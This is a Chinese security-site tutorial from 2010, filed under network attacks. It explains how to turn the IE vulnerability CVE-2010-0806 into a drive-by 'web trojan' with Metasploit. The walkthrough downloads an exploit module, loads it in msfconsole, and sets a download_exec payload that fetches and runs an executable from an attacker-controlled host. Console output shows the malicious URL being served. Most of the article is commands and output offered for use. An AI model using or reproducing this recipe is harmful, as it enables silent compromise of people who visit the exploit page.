热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

最新网马0day(CVE-2010-0806)+Metasploit生成方法

发布时间:2010-03-15 19:13文章来源:未知文章作者:黑白前线 点击次数:
摘要:一、下载http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb 二、放到C:\Metasploit\Framework3\msf3\modules\exploits\test。我改个了名字叫ie.rb 三、启动msfconsole 四、 msf useexploit/test/ie msfexploit(ie) showoptinos 回显: Module opti...

 

一、下载http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb
 
二、放到C:\Metasploit\Framework3\msf3\modules\exploits\test。我改个了名字叫ie.rb
 
三、启动msfconsole
 
四、
  1. msf > use exploit/test/ie  
  2. msf exploit(ie) > show optinos  
回显:

Module options:
   Name        Current Setting Required Description
   ----        --------------- -------- -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Exploit target:
   Id Name
   -- ----
   0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
msf exploit(ie) > set srvhost 192.168.0.3
srvhost => 192.168.0.3
msf exploit(ie) > set srvport 8080
srvport => 8080

msf exploit(ie) > set payload windows/download_exec
payload => windows/download_exec
msf exploit(ie) > set url http://192.168.0.3/demo.exe
url => http://192.168.0.3/demo.exe
msf exploit(ie) > exploit
[*] Exploit running as background job.
msf exploit(ie) >
[*] Using URL: http://192.168.0.3:8080/4rJ0JRSnX55wAY
[*] Server started.

然后打开http://192.168.0.3:8080/4rJ0JRSnX55wAY,你就可以看到源码了。


红字是命令,其它的是回显
 

标签分类: 网络攻击

上一篇:电子图书CHM捆绑木马攻击
下一篇:无ARP欺骗的嗅探技术